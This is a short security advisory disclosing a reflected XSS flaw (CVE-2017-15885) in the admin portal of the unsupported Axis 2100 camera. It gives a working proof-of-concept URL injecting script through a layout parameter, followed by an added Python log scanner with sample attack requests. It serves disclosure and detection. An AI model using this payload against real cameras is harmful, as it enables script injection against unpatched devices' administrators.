Update: this has been assigned CVE-2017-15885.
I have found a vulnerability in the Axis 2100 Network Camera running 2.03 firmware. The vulnerability has been disclosed to the vendor, but the camera is no longer supported.
Reflected XSS in the web administration portal of the Axis 2100 Network Camera 2.03 allows an attacker to execute arbitrary JavaScript via a URL.
PoC verified on Firefox 55.0.3:
http://xxx.xxx.xxx.xxx/view/view.shtml?paramskip=yes&conf_Layout_BGColorEnabled=yes&conf_Layout_OwnBGColorEnabled=no&conf_Layout_OwnBGColor=White&conf_Layout_TextColorEnabled=yes&conf_Layout_OwnTextColorEnabled=no&conf_Layout_OwnTextColor=Black&conf_Layout_BackgroundEnabled=yes&conf_Layout_OwnBackgroundEnabled=no&conf_Layout_OwnBackground=http://&conf_Layout_TitleEnabled=yes&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert('test')%3C/script%3E&conf_Layout_LogoEnabled=yes&conf_Layout_OwnLogoEnabled=no&conf_Layout_OwnLogo=http%3A//&conf_Layout_LinkEnabled=yes&conf_Layout_OwnLinkEnabled=no&conf_Layout_OwnLink=http%3A//&conf_Layout_DescriptionEnabled=yes&conf_Layout_OwnDescriptionEnabled=no&conf_Layout_OwnDescription=&conf_Layout_RelayButtonsEnabled=yes&conf_Layout_AdminButtonsEnabled=yes&conf_Layout_LayoutEnabled=no
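Because the camera will not receive a fix, one defensive option is to watch for this request pattern in the access logs of whatever sits in front of it. The following is an added example, not part of the original advisory: it flags requests to /view/view.shtml whose conf_Layout_* parameters carry HTML markup. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a combined-format access log entry (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let an echoed value break out of the surrounding HTML.
MARKUP = re.compile(r'[<>"]')

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2018:10:00:00 +0000] "GET /view/view.shtml?paramskip=yes'
    '&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert(\'test\')'
    '%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Jan/2018:10:01:00 +0000] "GET /view/view.shtml?'
    'conf_Layout_OwnTitle=Front+door&conf_Layout_OwnBGColor=White HTTP/1.1" 200 5090',
    '198.51.100.9 - - [01/Jan/2018:10:02:00 +0000] "GET /view/view.shtml?'
    'conf_Layout_OwnTitle=%253Cb%253E HTTP/1.1" 200 5095',
    '198.51.100.9 - - [01/Jan/2018:10:03:00 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 812',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253C is treated like %3C."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return the conf_Layout_* parameters of a view.shtml request that carry markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/view/view.shtml"):
        return []
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.startswith("conf_Layout_") and MARKUP.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        flagged = suspicious_params(line)
        if flagged:
            print(flagged, line.split()[0])
```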